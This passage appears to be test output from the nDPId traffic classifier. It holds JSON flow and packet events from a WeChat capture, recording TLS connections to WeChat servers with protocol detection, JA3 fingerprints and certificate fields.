+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167478295,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA044hAAEAGMbzAqAFny82XotNdAbtNZ116WRhNMIARAViFkQAAAQEICgAxu\/1F0qIP"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0trJAAEAGXpLAqAFny82XotNeAbstqSV4qlMZrIARASwk9gAAAQEICgAxu\/1Frj0D"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617248,"flow_last_seen":1492167617248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617248,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1492167617248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617248,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8JpFAAEAG7qvAqAFny82XotNfAbt51Z1vAAAAAKACchAH4QAAAgQFtAQCCAoAMbv+AAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617498,"flow_last_seen":1492167617498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617498,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
